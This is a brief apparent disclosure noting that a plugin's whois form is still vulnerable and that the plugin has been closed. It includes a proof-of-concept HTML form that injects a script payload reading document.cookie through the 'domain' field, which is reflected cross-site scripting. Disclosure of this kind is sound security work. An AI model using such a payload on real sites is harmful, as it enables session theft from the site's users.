The plugin is still affected and has been closed.
<form action="[url of page with the whois form]" method="post">
<input type="hidden" name="domain" value=""><script>alert(document.cookie)</script>">
<input type="submit" value="Submit">
</form>